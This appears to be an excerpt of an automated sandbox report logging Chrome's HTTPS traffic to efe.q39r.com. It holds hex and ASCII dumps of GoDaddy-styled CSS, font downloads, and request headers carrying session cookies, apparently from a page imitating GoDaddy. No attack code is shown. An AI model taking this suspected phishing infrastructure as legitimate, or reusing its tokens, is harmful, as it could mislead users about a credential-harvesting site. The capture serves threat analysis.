                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 20 20 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c 69 64 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 44 42 31 38 30 32 20 21 69 6d 70 6f 72 74 61 6e 74
                                                                                  Data Ascii: lor: currentColor; fill: currentColor;}#sections_godaddy .ux-text-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--invalid { border-color: #DB1802 !important
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73 72 2d 6f 6e 6c 79 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a
                                                                                  Data Ascii: ions_godaddy .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-path: inset(50%); clip-path: inset(50%);
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2e 30 39 33 37 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62
                                                                                  Data Ascii: er-box; padding: 0; vertical-align: .09375rem;}#sections_godaddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container::after { content: ""; display: tab
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d 73 65 72 69 66 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 65 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63
                                                                                  Data Ascii: px solid var(--ux-97h3vl,#d3d3d3);}#sections_godaddy .ux-card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-serif); font-weight: bolder;}#sec
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 2c 76 61 72 28 2d 2d 75 78 2d 39 71 70 66 36 63 2c 23 30 30 66 29 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 75 71 34 39 70 67 2c 76 61 72 28 2d 2d 75 78 2d 68 36 65 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20
                                                                                  Data Ascii: ,var(--ux-9qpf6c,#00f)); color: var(--ux-uq49pg,var(--ux-h6e7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff; background-color: #000; border-color:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.1749748172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:32 UTC1414OUTGET /pq6n4pZVF34fr6WWmmuv39 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Origin: https://efe.q39r.com
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: font
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC617INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Content-Type: font/woff2
                                                                                  Content-Length: 28000
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="pq6n4pZVF34fr6WWmmuv39"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eo81zH5AkiMGIxjiGOxRUdoC7W%2FVbVWzYpTpDw9wQ9WqUkKFF6BzUZwqEBYhe3JlE8HxMGfht1p7RjD%2BMSIXMhb0Yk6X1SJtDCTIsdoXFkgdn%2FG4snipLjBx6jtDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada009b244e4-ATL
                                                                                  2024-04-25 16:23:33 UTC752INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                                                  Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d e5 12 6a 18 bb 24 b6 dc ca 76 b6 2a 43 18 44 fe 71 a9
                                                                                  Data Ascii: hP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]j$v*CDq
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a 8b 85 5e ca a3 dc 75 85 2b e0 30 ac 55 ea ed 61 ee f8
                                                                                  Data Ascii: 2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:^u+0Ua
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3 8f 3f 86 9b ff 3b dd 9e 48 b6 50 f6 da 04 3c 9d 93 59
                                                                                  Data Ascii: 9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|?;HP<Y
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2 a7 6d b2 50 7a fd 83 9e 09 59 ba 40 ff ba d9 2a 6d a3
                                                                                  Data Ascii: jM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->mPzY@*m
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a 29 54 d2 64 c9 91 a7 40 89 a2 74 11 35 59 a3 4e 03 4d
                                                                                  Data Ascii: gK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2)Td@t5YNM
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f dd 27 48 e7 20 ba 7f 9a bb 53 d4 32 c3 c3 11 59 11 56
                                                                                  Data Ascii: @`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_'H S2YV
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5 21 b9 79 ec 7d 89 41 6e 78 78 e8 81 87 f5 4d cb 09 b0
                                                                                  Data Ascii: {_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM!y}AnxxM
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b 83 57 1e 81 d4 75 41 77 3a b7 59 8b b0 34 ec d4 02 d2
                                                                                  Data Ascii: i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_WuAw:Y4
                                                                                  2024-04-25 16:23:33 UTC474INData Raw: 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4 66 86 cf a8 ea 07 b9 46 7e 13 54 1d 4f 2d de cc 88 5a
                                                                                  Data Ascii: [|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAGfF~TO-Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.1749750172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:32 UTC1413OUTGET /12YCk90LK56Se1ynKqr42 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Origin: https://efe.q39r.com
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: font
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC615INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Content-Type: font/woff
                                                                                  Content-Length: 35970
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="12YCk90LK56Se1ynKqr42"
                                                                                  CF-Cache-Status: DYNAMIC
